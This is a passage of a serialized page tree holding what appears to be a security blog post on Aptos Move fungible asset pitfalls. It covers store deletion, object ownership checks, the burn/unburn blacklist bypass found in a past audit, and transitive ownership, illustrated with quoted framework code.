project_uri",{"type":27,"tag":207,"props":70412,"children":70413},{"style":238},[70414],{"type":33,"value":1842},{"type":27,"tag":207,"props":70416,"children":70417},{"class":209,"line":4095},[70418],{"type":27,"tag":207,"props":70419,"children":70420},{"style":238},[70421],{"type":33,"value":10637},{"type":27,"tag":207,"props":70423,"children":70424},{"class":209,"line":4103},[70425],{"type":27,"tag":207,"props":70426,"children":70427},{"style":238},[70428],{"type":33,"value":50903},{"type":27,"tag":207,"props":70430,"children":70431},{"class":209,"line":4154},[70432,70436,70440],{"type":27,"tag":207,"props":70433,"children":70434},{"style":238},[70435],{"type":33,"value":11019},{"type":27,"tag":207,"props":70437,"children":70438},{"style":226},[70439],{"type":33,"value":16867},{"type":27,"tag":207,"props":70441,"children":70442},{"style":238},[70443],{"type":33,"value":19050},{"type":27,"tag":207,"props":70445,"children":70446},{"class":209,"line":4203},[70447],{"type":27,"tag":207,"props":70448,"children":70449},{"style":238},[70450],{"type":33,"value":451},{"type":27,"tag":26063,"props":70452,"children":70453},{},[],{"type":27,"tag":36,"props":70455,"children":70456},{},[70457,70459,70464,70466,70471],{"type":33,"value":70458},"Deletions can be a big issue even when dealing with objects that are eligible for deletion. For example, a ",{"type":27,"tag":84,"props":70460,"children":70462},{"className":70461},[],[70463],{"type":33,"value":69308},{"type":33,"value":70465}," is also an object, and a \"secondary\" ",{"type":27,"tag":84,"props":70467,"children":70469},{"className":70468},[],[70470],{"type":33,"value":69308},{"type":33,"value":70472}," can be created as deletable if empty. The catch is that deletion can occur both at the fungible asset level and at the object level.",{"type":27,"tag":101,"props":70474,"children":70476},{"className":10270,"code":70475,"language":10269,"meta":7,"style":7},"//Fungible asset\npublic fun remove_store(delete_ref: &DeleteRef)\n\n//Object\npublic fun delete(ref: DeleteRef)\n",[70477],{"type":27,"tag":84,"props":70478,"children":70479},{"__ignoreMap":7},[70480,70488,70530,70537,70545],{"type":27,"tag":207,"props":70481,"children":70482},{"class":209,"line":210},[70483],{"type":27,"tag":207,"props":70484,"children":70485},{"style":4647},[70486],{"type":33,"value":70487},"//Fungible asset\n",{"type":27,"tag":207,"props":70489,"children":70490},{"class":209,"line":244},[70491,70495,70499,70504,70508,70513,70517,70521,70526],{"type":27,"tag":207,"props":70492,"children":70493},{"style":220},[70494],{"type":33,"value":68907},{"type":27,"tag":207,"props":70496,"children":70497},{"style":220},[70498],{"type":33,"value":13489},{"type":27,"tag":207,"props":70500,"children":70501},{"style":1335},[70502],{"type":33,"value":70503}," remove_store",{"type":27,"tag":207,"props":70505,"children":70506},{"style":238},[70507],{"type":33,"value":1343},{"type":27,"tag":207,"props":70509,"children":70510},{"style":220},[70511],{"type":33,"value":70512},"delete_ref",{"type":27,"tag":207,"props":70514,"children":70515},{"style":226},[70516],{"type":33,"value":736},{"type":27,"tag":207,"props":70518,"children":70519},{"style":226},[70520],{"type":33,"value":14423},{"type":27,"tag":207,"props":70522,"children":70523},{"style":8920},[70524],{"type":33,"value":70525},"DeleteRef",{"type":27,"tag":207,"props":70527,"children":70528},{"style":238},[70529],{"type":33,"value":10449},{"type":27,"tag":207,"props":70531,"children":70532},{"class":209,"line":270},[70533],{"type":27,"tag":207,"props":70534,"children":70535},{"emptyLinePlaceholder":19},[70536],{"type":33,"value":2062},{"type":27,"tag":207,"props":70538,"children":70539},{"class":209,"line":296},[70540],{"type":27,"tag":207,"props":70541,"children":70542},{"style":4647},[70543],{"type":33,"value":70544},"//Object\n",{"type":27,"tag":207,"props":70546,"children":70547},{"class":209,"line":445},[70548,70552,70556,70561,70565,70570,70574,70579],{"type":27,"tag":207,"props":70549,"children":70550},{"style":220},[70551],{"type":33,"value":68907},{"type":27,"tag":207,"props":70553,"children":70554},{"style":220},[70555],{"type":33,"value":13489},{"type":27,"tag":207,"props":70557,"children":70558},{"style":1335},[70559],{"type":33,"value":70560}," delete",{"type":27,"tag":207,"props":70562,"children":70563},{"style":238},[70564],{"type":33,"value":1343},{"type":27,"tag":207,"props":70566,"children":70567},{"style":214},[70568],{"type":33,"value":70569},"ref",{"type":27,"tag":207,"props":70571,"children":70572},{"style":226},[70573],{"type":33,"value":736},{"type":27,"tag":207,"props":70575,"children":70576},{"style":8920},[70577],{"type":33,"value":70578}," DeleteRef",{"type":27,"tag":207,"props":70580,"children":70581},{"style":238},[70582],{"type":33,"value":10449},{"type":27,"tag":36,"props":70584,"children":70585},{},[70586,70588,70594,70596,70601,70603,70608,70610,70615,70617,70623,70625,70631,70633,70638],{"type":33,"value":70587},"When ",{"type":27,"tag":84,"props":70589,"children":70591},{"className":70590},[],[70592],{"type":33,"value":70593},"object::delete",{"type":33,"value":70595}," removes the ",{"type":27,"tag":84,"props":70597,"children":70599},{"className":70598},[],[70600],{"type":33,"value":9262},{"type":33,"value":70602}," from a ",{"type":27,"tag":84,"props":70604,"children":70606},{"className":70605},[],[70607],{"type":33,"value":69308},{"type":33,"value":70609}," object, the ",{"type":27,"tag":84,"props":70611,"children":70613},{"className":70612},[],[70614],{"type":33,"value":69308},{"type":33,"value":70616}," resource becomes permanently undeletable. This is because ",{"type":27,"tag":84,"props":70618,"children":70620},{"className":70619},[],[70621],{"type":33,"value":70622},"remove_store",{"type":33,"value":70624}," can't create an ",{"type":27,"tag":84,"props":70626,"children":70628},{"className":70627},[],[70629],{"type":33,"value":70630},"Object\u003CFungibleStore>",{"type":33,"value":70632}," without an ",{"type":27,"tag":84,"props":70634,"children":70636},{"className":70635},[],[70637],{"type":33,"value":9262},{"type":33,"value":70639}," underneath, causing the operation to fail.",{"type":27,"tag":101,"props":70641,"children":70643},{"className":10270,"code":70642,"language":10269,"meta":7,"style":7},"public fun remove_store(delete_ref: &DeleteRef) acquires [...] {\n let store = &object::object_from_delete_ref\u003CFungibleStore>(delete_ref);\n [...]\n}\n",[70644],{"type":27,"tag":84,"props":70645,"children":70646},{"__ignoreMap":7},[70647,70702,70754,70769],{"type":27,"tag":207,"props":70648,"children":70649},{"class":209,"line":210},[70650,70654,70658,70662,70666,70670,70674,70678,70682,70686,70690,70694,70698],{"type":27,"tag":207,"props":70651,"children":70652},{"style":220},[70653],{"type":33,"value":68907},{"type":27,"tag":207,"props":70655,"children":70656},{"style":220},[70657],{"type":33,"value":13489},{"type":27,"tag":207,"props":70659,"children":70660},{"style":1335},[70661],{"type":33,"value":70503},{"type":27,"tag":207,"props":70663,"children":70664},{"style":238},[70665],{"type":33,"value":1343},{"type":27,"tag":207,"props":70667,"children":70668},{"style":220},[70669],{"type":33,"value":70512},{"type":27,"tag":207,"props":70671,"children":70672},{"style":226},[70673],{"type":33,"value":736},{"type":27,"tag":207,"props":70675,"children":70676},{"style":226},[70677],{"type":33,"value":14423},{"type":27,"tag":207,"props":70679,"children":70680},{"style":8920},[70681],{"type":33,"value":70525},{"type":27,"tag":207,"props":70683,"children":70684},{"style":238},[70685],{"type":33,"value":2222},{"type":27,"tag":207,"props":70687,"children":70688},{"style":220},[70689],{"type":33,"value":13626},{"type":27,"tag":207,"props":70691,"children":70692},{"style":238},[70693],{"type":33,"value":30305},{"type":27,"tag":207,"props":70695,"children":70696},{"style":226},[70697],{"type":33,"value":16867},{"type":27,"tag":207,"props":70699,"children":70700},{"style":238},[70701],{"type":33,"value":68998},{"type":27,"tag":207,"props":70703,"children":70704},{"class":209,"line":244},[70705,70709,70713,70717,70721,70725,70729,70734,70738,70742,70746,70750],{"type":27,"tag":207,"props":70706,"children":70707},{"style":214},[70708],{"type":33,"value":10290},{"type":27,"tag":207,"props":70710,"children":70711},{"style":220},[70712],{"type":33,"value":13113},{"type":27,"tag":207,"props":70714,"children":70715},{"style":226},[70716],{"type":33,"value":229},{"type":27,"tag":207,"props":70718,"children":70719},{"style":226},[70720],{"type":33,"value":14423},{"type":27,"tag":207,"props":70722,"children":70723},{"style":238},[70724],{"type":33,"value":70142},{"type":27,"tag":207,"props":70726,"children":70727},{"style":226},[70728],{"type":33,"value":10768},{"type":27,"tag":207,"props":70730,"children":70731},{"style":220},[70732],{"type":33,"value":70733},"object_from_delete_ref",{"type":27,"tag":207,"props":70735,"children":70736},{"style":238},[70737],{"type":33,"value":9257},{"type":27,"tag":207,"props":70739,"children":70740},{"style":8920},[70741],{"type":33,"value":69308},{"type":27,"tag":207,"props":70743,"children":70744},{"style":238},[70745],{"type":33,"value":14893},{"type":27,"tag":207,"props":70747,"children":70748},{"style":220},[70749],{"type":33,"value":70512},{"type":27,"tag":207,"props":70751,"children":70752},{"style":238},[70753],{"type":33,"value":1455},{"type":27,"tag":207,"props":70755,"children":70756},{"class":209,"line":270},[70757,70761,70765],{"type":27,"tag":207,"props":70758,"children":70759},{"style":238},[70760],{"type":33,"value":69950},{"type":27,"tag":207,"props":70762,"children":70763},{"style":226},[70764],{"type":33,"value":16867},{"type":27,"tag":207,"props":70766,"children":70767},{"style":238},[70768],{"type":33,"value":19050},{"type":27,"tag":207,"props":70770,"children":70771},{"class":209,"line":296},[70772],{"type":27,"tag":207,"props":70773,"children":70774},{"style":238},[70775],{"type":33,"value":451},{"type":27,"tag":36,"props":70777,"children":70778},{},[70779,70781,70786,70788,70794,70796,70801],{"type":33,"value":70780},"In addition, such \"deleted\" ",{"type":27,"tag":84,"props":70782,"children":70784},{"className":70783},[],[70785],{"type":33,"value":69308},{"type":33,"value":70787}," objects remain at least partially operable. For instance, ",{"type":27,"tag":84,"props":70789,"children":70791},{"className":70790},[],[70792],{"type":33,"value":70793},"fungible_asset::deposit",{"type":33,"value":70795}," does not check the ",{"type":27,"tag":84,"props":70797,"children":70799},{"className":70798},[],[70800],{"type":33,"value":9262},{"type":33,"value":70802}," existence.",{"type":27,"tag":58,"props":70804,"children":70806},{"id":70805},"ownership",[70807],{"type":33,"value":70808},"Ownership",{"type":27,"tag":36,"props":70810,"children":70811},{},[70812,70814,70819,70821,70827,70829,70834],{"type":33,"value":70813},"Each object has an owner. Fungible assets rely on the ",{"type":27,"tag":84,"props":70815,"children":70817},{"className":70816},[],[70818],{"type":33,"value":9262},{"type":33,"value":70820}," ownership model. For example, during a withdrawal operation, the signer is validated using ",{"type":27,"tag":84,"props":70822,"children":70824},{"className":70823},[],[70825],{"type":33,"value":70826},"object::owns",{"type":33,"value":70828}," to confirm ownership of the ",{"type":27,"tag":84,"props":70830,"children":70832},{"className":70831},[],[70833],{"type":33,"value":69308},{"type":33,"value":57415},{"type":27,"tag":101,"props":70836,"children":70838},{"className":10270,"code":70837,"language":10269,"meta":7,"style":7},"public(friend) fun withdraw_sanity_check\u003CT: key>(\n owner: &signer,\n store: Object\u003CT>,\n abort_on_dispatch: bool,\n) acquires FungibleStore, DispatchFunctionStore {\n assert!(object::owns(store, signer::address_of(owner)), error::permission_denied(ENOT_STORE_OWNER));\n [...]\n}\n",[70839],{"type":27,"tag":84,"props":70840,"children":70841},{"__ignoreMap":7},[70842,70890,70914,70941,70961,70989,71057,71072],{"type":27,"tag":207,"props":70843,"children":70844},{"class":209,"line":210},[70845,70849,70853,70857,70861,70865,70870,70874,70878,70882,70886],{"type":27,"tag":207,"props":70846,"children":70847},{"style":1335},[70848],{"type":33,"value":68907},{"type":27,"tag":207,"props":70850,"children":70851},{"style":238},[70852],{"type":33,"value":1343},{"type":27,"tag":207,"props":70854,"children":70855},{"style":220},[70856],{"type":33,"value":14380},{"type":27,"tag":207,"props":70858,"children":70859},{"style":238},[70860],{"type":33,"value":2222},{"type":27,"tag":207,"props":70862,"children":70863},{"style":220},[70864],{"type":33,"value":14389},{"type":27,"tag":207,"props":70866,"children":70867},{"style":220},[70868],{"type":33,"value":70869}," withdraw_sanity_check",{"type":27,"tag":207,"props":70871,"children":70872},{"style":238},[70873],{"type":33,"value":9257},{"type":27,"tag":207,"props":70875,"children":70876},{"style":8920},[70877],{"type":33,"value":13269},{"type":27,"tag":207,"props":70879,"children":70880},{"style":226},[70881],{"type":33,"value":736},{"type":27,"tag":207,"props":70883,"children":70884},{"style":220},[70885],{"type":33,"value":13213},{"type":27,"tag":207,"props":70887,"children":70888},{"style":238},[70889],{"type":33,"value":13870},{"type":27,"tag":207,"props":70891,"children":70892},{"class":209,"line":244},[70893,70898,70902,70906,70910],{"type":27,"tag":207,"props":70894,"children":70895},{"style":220},[70896],{"type":33,"value":70897}," owner",{"type":27,"tag":207,"props":70899,"children":70900},{"style":226},[70901],{"type":33,"value":736},{"type":27,"tag":207,"props":70903,"children":70904},{"style":226},[70905],{"type":33,"value":14423},{"type":27,"tag":207,"props":70907,"children":70908},{"style":220},[70909],{"type":33,"value":14428},{"type":27,"tag":207,"props":70911,"children":70912},{"style":238},[70913],{"type":33,"value":1842},{"type":27,"tag":207,"props":70915,"children":70916},{"class":209,"line":270},[70917,70921,70925,70929,70933,70937],{"type":27,"tag":207,"props":70918,"children":70919},{"style":220},[70920],{"type":33,"value":36676},{"type":27,"tag":207,"props":70922,"children":70923},{"style":226},[70924],{"type":33,"value":736},{"type":27,"tag":207,"props":70926,"children":70927},{"style":8920},[70928],{"type":33,"value":68793},{"type":27,"tag":207,"props":70930,"children":70931},{"style":238},[70932],{"type":33,"value":9257},{"type":27,"tag":207,"props":70934,"children":70935},{"style":8920},[70936],{"type":33,"value":13269},{"type":27,"tag":207,"props":70938,"children":70939},{"style":238},[70940],{"type":33,"value":13420},{"type":27,"tag":207,"props":70942,"children":70943},{"class":209,"line":296},[70944,70949,70953,70957],{"type":27,"tag":207,"props":70945,"children":70946},{"style":220},[70947],{"type":33,"value":70948}," abort_on_dispatch",{"type":27,"tag":207,"props":70950,"children":70951},{"style":226},[70952],{"type":33,"value":736},{"type":27,"tag":207,"props":70954,"children":70955},{"style":8920},[70956],{"type":33,"value":19327},{"type":27,"tag":207,"props":70958,"children":70959},{"style":238},[70960],{"type":33,"value":1842},{"type":27,"tag":207,"props":70962,"children":70963},{"class":209,"line":445},[70964,70968,70972,70976,70980,70985],{"type":27,"tag":207,"props":70965,"children":70966},{"style":238},[70967],{"type":33,"value":2222},{"type":27,"tag":207,"props":70969,"children":70970},{"style":220},[70971],{"type":33,"value":13626},{"type":27,"tag":207,"props":70973,"children":70974},{"style":8920},[70975],{"type":33,"value":69328},{"type":27,"tag":207,"props":70977,"children":70978},{"style":238},[70979],{"type":33,"value":1123},{"type":27,"tag":207,"props":70981,"children":70982},{"style":8920},[70983],{"type":33,"value":70984},"DispatchFunctionStore",{"type":27,"tag":207,"props":70986,"children":70987},{"style":238},[70988],{"type":33,"value":384},{"type":27,"tag":207,"props":70990,"children":70991},{"class":209,"line":867},[70992,70996,71001,71005,71010,71014,71018,71022,71026,71030,71034,71038,71043,71047,71052],{"type":27,"tag":207,"props":70993,"children":70994},{"style":1335},[70995],{"type":33,"value":69576},{"type":27,"tag":207,"props":70997,"children":70998},{"style":238},[70999],{"type":33,"value":71000},"(object",{"type":27,"tag":207,"props":71002,"children":71003},{"style":226},[71004],{"type":33,"value":10768},{"type":27,"tag":207,"props":71006,"children":71007},{"style":1335},[71008],{"type":33,"value":71009},"owns",{"type":27,"tag":207,"props":71011,"children":71012},{"style":238},[71013],{"type":33,"value":1343},{"type":27,"tag":207,"props":71015,"children":71016},{"style":220},[71017],{"type":33,"value":13222},{"type":27,"tag":207,"props":71019,"children":71020},{"style":238},[71021],{"type":33,"value":20213},{"type":27,"tag":207,"props":71023,"children":71024},{"style":226},[71025],{"type":33,"value":10768},{"type":27,"tag":207,"props":71027,"children":71028},{"style":1335},[71029],{"type":33,"value":14491},{"type":27,"tag":207,"props":71031,"children":71032},{"style":238},[71033],{"type":33,"value":1343},{"type":27,"tag":207,"props":71035,"children":71036},{"style":220},[71037],{"type":33,"value":22884},{"type":27,"tag":207,"props":71039,"children":71040},{"style":238},[71041],{"type":33,"value":71042},")), error",{"type":27,"tag":207,"props":71044,"children":71045},{"style":226},[71046],{"type":33,"value":10768},{"type":27,"tag":207,"props":71048,"children":71049},{"style":1335},[71050],{"type":33,"value":71051},"permission_denied",{"type":27,"tag":207,"props":71053,"children":71054},{"style":238},[71055],{"type":33,"value":71056},"(ENOT_STORE_OWNER));\n",{"type":27,"tag":207,"props":71058,"children":71059},{"class":209,"line":892},[71060,71064,71068],{"type":27,"tag":207,"props":71061,"children":71062},{"style":238},[71063],{"type":33,"value":69950},{"type":27,"tag":207,"props":71065,"children":71066},{"style":226},[71067],{"type":33,"value":16867},{"type":27,"tag":207,"props":71069,"children":71070},{"style":238},[71071],{"type":33,"value":19050},{"type":27,"tag":207,"props":71073,"children":71074},{"class":209,"line":1475},[71075],{"type":27,"tag":207,"props":71076,"children":71077},{"style":238},[71078],{"type":33,"value":451},{"type":27,"tag":36,"props":71080,"children":71081},{},[71082,71084,71089,71091,71097,71099,71105],{"type":33,"value":71083},"The thing to note is that defining ownership with ",{"type":27,"tag":84,"props":71085,"children":71087},{"className":71086},[],[71088],{"type":33,"value":70826},{"type":33,"value":71090}," can be tricky. The ",{"type":27,"tag":84,"props":71092,"children":71094},{"className":71093},[],[71095],{"type":33,"value":71096},"burn",{"type":33,"value":71098}," function was one of the reasons behind that. It allowed changing the object's owner to the ",{"type":27,"tag":84,"props":71100,"children":71102},{"className":71101},[],[71103],{"type":33,"value":71104},"BURN_ADDRESS",{"type":33,"value":71106}," while bypassing transfer restrictions:",{"type":27,"tag":101,"props":71108,"children":71110},{"className":10270,"code":71109,"language":10269,"meta":7,"style":7},"public entry fun burn\u003CT: key>(owner: &signer, object: Object\u003CT>) acquires ObjectCore {\n let original_owner = signer::address_of(owner);\n assert!(is_owner(object, original_owner), error::permission_denied(ENOT_OBJECT_OWNER));\n let object_addr = object.inner;\n move_to(&create_signer(object_addr), TombStone { original_owner });\n transfer_raw_inner(object_addr, BURN_ADDRESS);\n}\n",[71111],{"type":27,"tag":84,"props":71112,"children":71113},{"__ignoreMap":7},[71114,71211,71252,71302,71331,71381,71402],{"type":27,"tag":207,"props":71115,"children":71116},{"class":209,"line":210},[71117,71121,71125,71129,71134,71138,71142,71146,71150,71154,71158,71162,71166,71170,71174,71178,71182,71186,71190,71194,71198,71202,71207],{"type":27,"tag":207,"props":71118,"children":71119},{"style":220},[71120],{"type":33,"value":68907},{"type":27,"tag":207,"props":71122,"children":71123},{"style":220},[71124],{"type":33,"value":69874},{"type":27,"tag":207,"props":71126,"children":71127},{"style":220},[71128],{"type":33,"value":13489},{"type":27,"tag":207,"props":71130,"children":71131},{"style":220},[71132],{"type":33,"value":71133}," burn",{"type":27,"tag":207,"props":71135,"children":71136},{"style":238},[71137],{"type":33,"value":9257},{"type":27,"tag":207,"props":71139,"children":71140},{"style":8920},[71141],{"type":33,"value":13269},{"type":27,"tag":207,"props":71143,"children":71144},{"style":226},[71145],{"type":33,"value":736},{"type":27,"tag":207,"props":71147,"children":71148},{"style":220},[71149],{"type":33,"value":13213},{"type":27,"tag":207,"props":71151,"children":71152},{"style":238},[71153],{"type":33,"value":14893},{"type":27,"tag":207,"props":71155,"children":71156},{"style":220},[71157],{"type":33,"value":22884},{"type":27,"tag":207,"props":71159,"children":71160},{"style":226},[71161],{"type":33,"value":736},{"type":27,"tag":207,"props":71163,"children":71164},{"style":226},[71165],{"type":33,"value":14423},{"type":27,"tag":207,"props":71167,"children":71168},{"style":220},[71169],{"type":33,"value":14428},{"type":27,"tag":207,"props":71171,"children":71172},{"style":238},[71173],{"type":33,"value":1123},{"type":27,"tag":207,"props":71175,"children":71176},{"style":220},[71177],{"type":33,"value":70142},{"type":27,"tag":207,"props":71179,"children":71180},{"style":226},[71181],{"type":33,"value":736},{"type":27,"tag":207,"props":71183,"children":71184},{"style":8920},[71185],{"type":33,"value":68793},{"type":27,"tag":207,"props":71187,"children":71188},{"style":238},[71189],{"type":33,"value":9257},{"type":27,"tag":207,"props":71191,"children":71192},{"style":8920},[71193],{"type":33,"value":13269},{"type":27,"tag":207,"props":71195,"children":71196},{"style":238},[71197],{"type":33,"value":27718},{"type":27,"tag":207,"props":71199,"children":71200},{"style":220},[71201],{"type":33,"value":13626},{"type":27,"tag":207,"props":71203,"children":71204},{"style":8920},[71205],{"type":33,"value":71206}," ObjectCore",{"type":27,"tag":207,"props":71208,"children":71209},{"style":238},[71210],{"type":33,"value":384},{"type":27,"tag":207,"props":71212,"children":71213},{"class":209,"line":244},[71214,71218,71223,71227,71232,71236,71240,71244,71248],{"type":27,"tag":207,"props":71215,"children":71216},{"style":214},[71217],{"type":33,"value":10290},{"type":27,"tag":207,"props":71219,"children":71220},{"style":220},[71221],{"type":33,"value":71222}," original_owner",{"type":27,"tag":207,"props":71224,"children":71225},{"style":226},[71226],{"type":33,"value":229},{"type":27,"tag":207,"props":71228,"children":71229},{"style":238},[71230],{"type":33,"value":71231}," signer",{"type":27,"tag":207,"props":71233,"children":71234},{"style":226},[71235],{"type":33,"value":10768},{"type":27,"tag":207,"props":71237,"children":71238},{"style":1335},[71239],{"type":33,"value":14491},{"type":27,"tag":207,"props":71241,"children":71242},{"style":238},[71243],{"type":33,"value":1343},{"type":27,"tag":207,"props":71245,"children":71246},{"style":220},[71247],{"type":33,"value":22884},{"type":27,"tag":207,"props":71249,"children":71250},{"style":238},[71251],{"type":33,"value":1455},{"type":27,"tag":207,"props":71253,"children":71254},{"class":209,"line":270},[71255,71259,71263,71268,71272,71276,71280,71285,71289,71293,71297],{"type":27,"tag":207,"props":71256,"children":71257},{"style":1335},[71258],{"type":33,"value":69576},{"type":27,"tag":207,"props":71260,"children":71261},{"style":238},[71262],{"type":33,"value":1343},{"type":27,"tag":207,"props":71264,"children":71265},{"style":1335},[71266],{"type":33,"value":71267},"is_owner",{"type":27,"tag":207,"props":71269,"children":71270},{"style":238},[71271],{"type":33,"value":1343},{"type":27,"tag":207,"props":71273,"children":71274},{"style":220},[71275],{"type":33,"value":70142},{"type":27,"tag":207,"props":71277,"children":71278},{"style":238},[71279],{"type":33,"value":1123},{"type":27,"tag":207,"props":71281,"children":71282},{"style":220},[71283],{"type":33,"value":71284},"original_owner",{"type":27,"tag":207,"props":71286,"children":71287},{"style":238},[71288],{"type":33,"value":70165},{"type":27,"tag":207,"props":71290,"children":71291},{"style":226},[71292],{"type":33,"value":10768},{"type":27,"tag":207,"props":71294,"children":71295},{"style":1335},[71296],{"type":33,"value":71051},{"type":27,"tag":207,"props":71298,"children":71299},{"style":238},[71300],{"type":33,"value":71301},"(ENOT_OBJECT_OWNER));\n",{"type":27,"tag":207,"props":71303,"children":71304},{"class":209,"line":296},[71305,71309,71314,71318,71322,71326],{"type":27,"tag":207,"props":71306,"children":71307},{"style":214},[71308],{"type":33,"value":10290},{"type":27,"tag":207,"props":71310,"children":71311},{"style":220},[71312],{"type":33,"value":71313}," object_addr",{"type":27,"tag":207,"props":71315,"children":71316},{"style":226},[71317],{"type":33,"value":229},{"type":27,"tag":207,"props":71319,"children":71320},{"style":220},[71321],{"type":33,"value":69726},{"type":27,"tag":207,"props":71323,"children":71324},{"style":226},[71325],{"type":33,"value":1041},{"type":27,"tag":207,"props":71327,"children":71328},{"style":238},[71329],{"type":33,"value":71330},"inner;\n",{"type":27,"tag":207,"props":71332,"children":71333},{"class":209,"line":445},[71334,71338,71342,71346,71351,71355,71360,71364,71369,71373,71377],{"type":27,"tag":207,"props":71335,"children":71336},{"style":1335},[71337],{"type":33,"value":70329},{"type":27,"tag":207,"props":71339,"children":71340},{"style":238},[71341],{"type":33,"value":1343},{"type":27,"tag":207,"props":71343,"children":71344},{"style":226},[71345],{"type":33,"value":10398},{"type":27,"tag":207,"props":71347,"children":71348},{"style":1335},[71349],{"type":33,"value":71350},"create_signer",{"type":27,"tag":207,"props":71352,"children":71353},{"style":238},[71354],{"type":33,"value":1343},{"type":27,"tag":207,"props":71356,"children":71357},{"style":220},[71358],{"type":33,"value":71359},"object_addr",{"type":27,"tag":207,"props":71361,"children":71362},{"style":238},[71363],{"type":33,"value":22452},{"type":27,"tag":207,"props":71365,"children":71366},{"style":8920},[71367],{"type":33,"value":71368},"TombStone",{"type":27,"tag":207,"props":71370,"children":71371},{"style":238},[71372],{"type":33,"value":16862},{"type":27,"tag":207,"props":71374,"children":71375},{"style":220},[71376],{"type":33,"value":71284},{"type":27,"tag":207,"props":71378,"children":71379},{"style":238},[71380],{"type":33,"value":46081},{"type":27,"tag":207,"props":71382,"children":71383},{"class":209,"line":867},[71384,71389,71393,71397],{"type":27,"tag":207,"props":71385,"children":71386},{"style":1335},[71387],{"type":33,"value":71388}," transfer_raw_inner",{"type":27,"tag":207,"props":71390,"children":71391},{"style":238},[71392],{"type":33,"value":1343},{"type":27,"tag":207,"props":71394,"children":71395},{"style":220},[71396],{"type":33,"value":71359},{"type":27,"tag":207,"props":71398,"children":71399},{"style":238},[71400],{"type":33,"value":71401},", BURN_ADDRESS);\n",{"type":27,"tag":207,"props":71403,"children":71404},{"class":209,"line":892},[71405],{"type":27,"tag":207,"props":71406,"children":71407},{"style":238},[71408],{"type":33,"value":451},{"type":27,"tag":36,"props":71410,"children":71411},{},[71412,71418,71420,71425,71426,71433,71435,71440],{"type":27,"tag":84,"props":71413,"children":71415},{"className":71414},[],[71416],{"type":33,"value":71417},"unburn",{"type":33,"value":71419}," is a way to restore the previous object owner. In a past audit, this mechanism could be exploited to bypass fungible store owner blacklisting by temporarily setting ownership to the unblacklisted ",{"type":27,"tag":84,"props":71421,"children":71423},{"className":71422},[],[71424],{"type":33,"value":71104},{"type":33,"value":1055},{"type":27,"tag":47,"props":71427,"children":71430},{"href":71428,"rel":71429},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-99.md",[51],[71431],{"type":33,"value":71432},"AIP-99",{"type":33,"value":71434}," is a proposal to roll back the ",{"type":27,"tag":84,"props":71436,"children":71438},{"className":71437},[],[71439],{"type":33,"value":71096},{"type":33,"value":71441}," feature, but previously burned objects will remain restorable.",{"type":27,"tag":10222,"props":71443,"children":71444},{},[71445],{"type":27,"tag":36,"props":71446,"children":71447},{},[71448,71450,71454],{"type":33,"value":71449},"This ",{"type":27,"tag":207,"props":71451,"children":71452},{},[71453],{"type":33,"value":71432},{"type":33,"value":71455}," seeks to disable safe object burn, as it caused extra complexity, and sometimes unexpected consequences. As a result of this AIP, users will still be able to unburn their burnt objects, but will not be able to burn any new objects.",{"type":27,"tag":36,"props":71457,"children":71458},{},[71459,71461,71467,71469,71474,71476,71481],{"type":33,"value":71460},"Another important thing is that ",{"type":27,"tag":84,"props":71462,"children":71464},{"className":71463},[],[71465],{"type":33,"value":71466},"fungible_asset::set_untransferable",{"type":33,"value":71468}," can be used to make all new ",{"type":27,"tag":84,"props":71470,"children":71472},{"className":71471},[],[71473],{"type":33,"value":69812},{"type":33,"value":71475}," for this asset untransferable, preventing ownership changes. However, this restriction doesn't apply to the parent object, allowing a transferable parent to be moved even if it owns a non-transferable ",{"type":27,"tag":84,"props":71477,"children":71479},{"className":71478},[],[71480],{"type":33,"value":69308},{"type":33,"value":1041},{"type":27,"tag":36,"props":71483,"children":71484},{},[71485,71487,71492,71494,71500,71502,71507,71509,71514],{"type":33,"value":71486},"Do we need to care about this case? We do, because ownership is transitive. If entity X owns an object that owns a ",{"type":27,"tag":84,"props":71488,"children":71490},{"className":71489},[],[71491],{"type":33,"value":69308},{"type":33,"value":71493},", X can withdraw from that store. This is because ",{"type":27,"tag":84,"props":71495,"children":71497},{"className":71496},[],[71498],{"type":33,"value":71499},"fungible_asset::withdraw",{"type":33,"value":71501}," uses ",{"type":27,"tag":84,"props":71503,"children":71505},{"className":71504},[],[71506],{"type":33,"value":70826},{"type":33,"value":71508}," to verify both direct and indirect ownership of the ",{"type":27,"tag":84,"props":71510,"children":71512},{"className":71511},[],[71513],{"type":33,"value":69308},{"type":33,"value":57415},{"type":27,"tag":101,"props":71516,"children":71518},{"className":10270,"code":71517,"language":10269,"meta":7,"style":7},"fun verify_ungated_and_descendant(owner: address, destination: address) acquires ObjectCore {\n [...]\n while (owner != current_address) {\n count = count + 1;\n [...]\n assert!(\n exists\u003CObjectCore>(current_address),\n error::permission_denied(ENOT_OBJECT_OWNER),\n );\n let object = borrow_global\u003CObjectCore>(current_address);\n current_address = object.owner;\n };\n}\n",[71519],{"type":27,"tag":84,"props":71520,"children":71521},{"__ignoreMap":7},[71522,71583,71599,71629,71658,71673,71685,71715,71736,71743,71783,71808,71815],{"type":27,"tag":207,"props":71523,"children":71524},{"class":209,"line":210},[71525,71529,71534,71538,71542,71546,71550,71554,71559,71563,71567,71571,71575,71579],{"type":27,"tag":207,"props":71526,"children":71527},{"style":220},[71528],{"type":33,"value":14389},{"type":27,"tag":207,"props":71530,"children":71531},{"style":1335},[71532],{"type":33,"value":71533}," verify_ungated_and_descendant",{"type":27,"tag":207,"props":71535,"children":71536},{"style":238},[71537],{"type":33,"value":1343},{"type":27,"tag":207,"props":71539,"children":71540},{"style":220},[71541],{"type":33,"value":22884},{"type":27,"tag":207,"props":71543,"children":71544},{"style":226},[71545],{"type":33,"value":736},{"type":27,"tag":207,"props":71547,"children":71548},{"style":220},[71549],{"type":33,"value":13532},{"type":27,"tag":207,"props":71551,"children":71552},{"style":238},[71553],{"type":33,"value":1123},{"type":27,"tag":207,"props":71555,"children":71556},{"style":220},[71557],{"type":33,"value":71558},"destination",{"type":27,"tag":207,"props":71560,"children":71561},{"style":226},[71562],{"type":33,"value":736},{"type":27,"tag":207,"props":71564,"children":71565},{"style":220},[71566],{"type":33,"value":13532},{"type":27,"tag":207,"props":71568,"children":71569},{"style":238},[71570],{"type":33,"value":2222},{"type":27,"tag":207,"props":71572,"children":71573},{"style":220},[71574],{"type":33,"value":13626},{"type":27,"tag":207,"props":71576,"children":71577},{"style":8920},[71578],{"type":33,"value":71206},{"type":27,"tag":207,"props":71580,"children":71581},{"style":238},[71582],{"type":33,"value":384},{"type":27,"tag":207,"props":71584,"children":71585},{"class":209,